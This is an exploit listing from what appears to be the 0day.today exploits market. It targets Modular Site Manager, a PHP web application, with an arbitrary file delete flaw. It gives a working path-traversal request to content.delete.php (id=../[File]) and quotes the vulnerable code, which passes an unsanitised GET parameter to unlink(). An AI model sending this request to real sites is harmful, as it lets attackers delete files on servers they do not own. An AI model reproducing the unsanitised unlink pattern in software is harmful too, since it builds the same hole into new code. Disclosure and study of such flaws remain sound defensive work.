[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Modular Site Manager <= Arbitrary Delete Vulnerability

Author
GoLd_M
Risk
[
Security Risk High
]
0day-ID
0day-ID-19153
Category
web applications
Date add
11-08-2012
Platform
php
# Exploit Title: Modular Site Manager <= Arbitrary Delete Vulnerability
# Date: 11/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/phpmsm/
# Category:: Arbitrary Delete Vulnerability
# Google dork: :(
# Tested on: Xp SP 2
# Ex :  [Modular Site Manager]/lk/content.delete.php?id=../[File]
# Code Page /lk/content.delete.php
# <?php
#      unlink('../content/'.$_GET['id']); << --- XXX
#      header("Location: ".$_SERVER['HTTP_REFERER']);
# ?>



#  0day.today [2024-12-25]  #